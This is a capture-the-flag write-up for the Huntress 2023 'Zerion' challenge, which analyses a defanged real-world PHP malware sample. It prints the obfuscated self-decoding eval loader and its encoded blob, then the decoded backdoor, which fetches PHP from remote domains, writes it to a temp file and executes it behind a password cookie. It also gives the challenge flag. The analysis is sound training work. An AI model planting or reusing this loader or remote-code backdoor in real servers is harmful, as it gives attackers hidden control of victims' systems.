huntress2023

Writeups for Huntress CTF 2023

View on GitHub

✅ MALWARE - Zerion

Writeup by: @goproslowyo

Tags

Files:

Description

Author: @JohnHammond

We observed some odd network traffic, and found this file on our web server… can you find the strange domains that our systems are reaching out to? NOTE, this challenge is based off of a real malware sample. We have done our best to “defang” the code, but out of abudance of caution it is strongly encouraged you only analyze this inside of a virtual environment separate from any production devices. Download the file(s) below.

Writeup

We get an obfuscated PHP script, let’s try to clean it up:

<?php
    $L66Rgr = explode(base64_decode("Pz4="), file_get_contents(__FILE__))
    $L6CRgr = array(base64_decode("L3gvaQ=="), base64_decode("eA=="), base64_decode(strrev(str_rot13($L66Rgr[1]))))
    $L7CRgr = "d6d666e70e43a3aeaec1be01341d9f9d"
    preg_replace($L6CRgr[0],serialize(eval($L6CRgr[2])),$L6CRgr[1])
    exit()
?>
==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

Interpolating some variables and decoding some base64 we’re left with:

We can see the reversed, rot13’d, base64’d blob which we can tackle with this CyberChef recipe.

And if you look closely you should be able to spot your flag:


function GC($a)
{
    $url = sprintf('%s?api=%s&ac=%s&path=%s&t=%s', $a, $_REQUEST['api'], $_REQUEST['ac'], $_REQUEST['path'], $_REQUEST['t']); $code = @file_get_contents($url); if ($code == false) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'll'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 100); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $code = curl_exec($ch); curl_close($ch); }return $code;}
if (isset($_REQUEST['ac']) && isset($_REQUEST['path']) && isset($_REQUEST['api']) && isset($_REQUEST['t'])) { $code = GC('https://c.-wic5-.com/'); if(!$code){$code = GC('https://c.-oiv3-.com/?flag=flag{af10370d485952897d5183aa09e19883}
');}$need = '<'.'?'.'php'; if (strpos($code, $need) === false) { die('get failed'); } $file_name = tmpfile(); fwrite($file_name, $code); $a = stream_get_meta_data($file_name);$file_path = $a['uri']; $content = @file_get_contents($file_path);if(!$content){$file_path = '.c'; file_put_contents($file_path, $code);}@require($file_path); fclose($file_name);@unlink($file_path);die(); }
if (isset($_REQUEST['d_time'])){ die('{->'.$L7CRgr.'<-}'); }
$pass = false;
if (isset($_COOKIE['pass'])) { if(md5($_COOKIE['pass']) == $L7CRgr) { $pass = true; } } else { if (isset($_POST['pass'])) { if(md5($_POST['pass']) == $L7CRgr) { setcookie("pass", $_POST['pass']); $pass = true; } } }
